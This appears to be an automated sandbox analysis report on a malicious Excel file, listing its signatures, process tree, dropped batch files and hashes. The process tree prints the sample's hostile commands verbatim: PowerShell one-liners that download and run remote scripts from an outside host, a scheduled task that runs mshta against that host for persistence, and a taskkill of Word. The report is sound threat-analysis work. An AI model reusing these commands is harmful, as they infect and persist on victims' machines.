Analysis
-
max time kernel
102s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16-08-2022 07:45
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls
Resource
win10v2004-20220812-en
General
-
Target
SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls
-
Size
33KB
-
MD5
7f57f9f35e9465cfc8fbac31913db94e
-
SHA1
d35cb428f2f57ce38f7c6e71e128bce88fc5fd58
-
SHA256
78f4a26a6d9e52be09cda8edeef93c3f2886ef7cdda107e49c88dbf5bfe3c962
-
SHA512
3f2e965a49bac3cc2a29fb37cd91976e379b74f697d933fe6b8f648e2c031c465fb63c6eedc94832dc404389577ff86e8d8f8b48938df03757100657fd182999
Malware Config
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4944 2096 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2040 2096 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1060 2096 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3500 2096 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 16 2348 powershell.exe 33 3212 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4868 taskkill.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 1760 PING.EXE 1572 PING.EXE 2116 PING.EXE 1780 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2096 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2348 powershell.exe 2348 powershell.exe 3212 powershell.exe 3212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
taskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4868 taskkill.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 3212 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE 2096 EXCEL.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2096 wrote to memory of 4944 2096 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 4944 2096 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 2040 2096 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 2040 2096 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 3500 2096 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 3500 2096 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 1060 2096 EXCEL.EXE cmd.exe PID 2096 wrote to memory of 1060 2096 EXCEL.EXE cmd.exe PID 2040 wrote to memory of 1760 2040 cmd.exe PING.EXE PID 2040 wrote to memory of 1760 2040 cmd.exe PING.EXE PID 1060 wrote to memory of 1572 1060 cmd.exe PING.EXE PID 1060 wrote to memory of 1572 1060 cmd.exe PING.EXE PID 4944 wrote to memory of 1780 4944 cmd.exe PING.EXE PID 4944 wrote to memory of 1780 4944 cmd.exe PING.EXE PID 3500 wrote to memory of 2116 3500 cmd.exe PING.EXE PID 3500 wrote to memory of 2116 3500 cmd.exe PING.EXE PID 3500 wrote to memory of 5040 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 5040 3500 cmd.exe cmd.exe PID 5040 wrote to memory of 2348 5040 cmd.exe powershell.exe PID 5040 wrote to memory of 2348 5040 cmd.exe powershell.exe PID 3500 wrote to memory of 4048 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 4048 3500 cmd.exe cmd.exe PID 4048 wrote to memory of 4868 4048 cmd.exe taskkill.exe PID 4048 wrote to memory of 4868 4048 cmd.exe taskkill.exe PID 4944 wrote to memory of 2204 4944 cmd.exe cmd.exe PID 4944 wrote to memory of 2204 4944 cmd.exe cmd.exe PID 2204 wrote to memory of 3212 2204 cmd.exe powershell.exe PID 2204 wrote to memory of 3212 2204 cmd.exe powershell.exe PID 2040 wrote to memory of 2176 2040 cmd.exe cmd.exe PID 2040 wrote to memory of 2176 2040 cmd.exe cmd.exe PID 2176 wrote to memory of 2576 2176 cmd.exe schtasks.exe PID 2176 wrote to memory of 2576 2176 cmd.exe schtasks.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 80 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 85 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 7 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\SYSTEM32\cmd.execmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 10 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c start /min taskkill /f /im WINWORD.EXE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im WINWORD.EXE4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52a0bc0fac096c06f079b79e8b4da255b
SHA17126e9868bff4fa7cac79503879934671af74ac3
SHA256c97149dab3072de77ceb9fb69a793cb95ace7162fc49982c9d406a285ed19787
SHA512a7f6548d8e85c48bbb5a5066c28af2fd899d078aad733f0544ed9f5dcc624f745c05fc41a8060acb318709260549938a074e2613b9fdc15f203d995ac532ff4d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
6KB
MD53159606cc69435c1ac83f707fee10f4a
SHA1486497233fbf6f8de6f873e2f85cd5f0a9d8a94a
SHA256958553a81c73b987a925a905287457da70cea1d9b7ab7e89716596333ae41448
SHA5122ae28aeada9723c8912500b2ab0ed63e0a65658a428cb4e6ed02d5021b9c112e0a16be21e7fb18354b6aad0f66fe805b7f82847c66d856445115dd356c16375f
-
C:\Users\Public\DefenderFile.batFilesize
1KB
MD5ae4a0997ce01f4ebbb3f3cc0054ce933
SHA1e5bfe3b390f1208b8b6ea0317f4364005f552851
SHA256a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce
SHA5125de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184
-
C:\Users\Public\Outlook.batFilesize
900B
MD50427a3545c2eaed3167cffe2cf5f8aba
SHA1b27f3a7d2b855f1d0b84727603add711bb6f6170
SHA256ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391
SHA512fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b
-
C:\Users\Public\task.batFilesize
954B
MD520a395a26f50352dc994664c3e7df533
SHA19b6407d22297b7af7c49aacd51bf42e51ced7029
SHA256c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32
SHA5122b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617
-
memory/1060-142-0x0000000000000000-mapping.dmp
-
memory/1572-144-0x0000000000000000-mapping.dmp
-
memory/1760-143-0x0000000000000000-mapping.dmp
-
memory/1780-146-0x0000000000000000-mapping.dmp
-
memory/2040-140-0x0000000000000000-mapping.dmp
-
memory/2096-134-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-154-0x000002B8FBCF5000-0x000002B8FBCF7000-memory.dmpFilesize
8KB
-
memory/2096-145-0x000002B8FBCF5000-0x000002B8FBCF7000-memory.dmpFilesize
8KB
-
memory/2096-133-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-173-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-138-0x00007FF8174D0000-0x00007FF8174E0000-memory.dmpFilesize
64KB
-
memory/2096-172-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-135-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-171-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-170-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-136-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-132-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmpFilesize
64KB
-
memory/2096-137-0x00007FF8174D0000-0x00007FF8174E0000-memory.dmpFilesize
64KB
-
memory/2116-147-0x0000000000000000-mapping.dmp
-
memory/2176-167-0x0000000000000000-mapping.dmp
-
memory/2204-159-0x0000000000000000-mapping.dmp
-
memory/2348-156-0x00007FF830A50000-0x00007FF831511000-memory.dmpFilesize
10.8MB
-
memory/2348-157-0x00007FF830A50000-0x00007FF831511000-memory.dmpFilesize
10.8MB
-
memory/2348-155-0x00007FF830A50000-0x00007FF831511000-memory.dmpFilesize
10.8MB
-
memory/2348-153-0x0000015DEA190000-0x0000015DEA1B2000-memory.dmpFilesize
136KB
-
memory/2348-150-0x0000000000000000-mapping.dmp
-
memory/2576-168-0x0000000000000000-mapping.dmp
-
memory/3212-165-0x00007FF830A50000-0x00007FF831511000-memory.dmpFilesize
10.8MB
-
memory/3212-164-0x00007FF830A50000-0x00007FF831511000-memory.dmpFilesize
10.8MB
-
memory/3212-160-0x0000000000000000-mapping.dmp
-
memory/3500-141-0x0000000000000000-mapping.dmp
-
memory/4048-151-0x0000000000000000-mapping.dmp
-
memory/4868-152-0x0000000000000000-mapping.dmp
-
memory/4944-139-0x0000000000000000-mapping.dmp
-
memory/5040-149-0x0000000000000000-mapping.dmp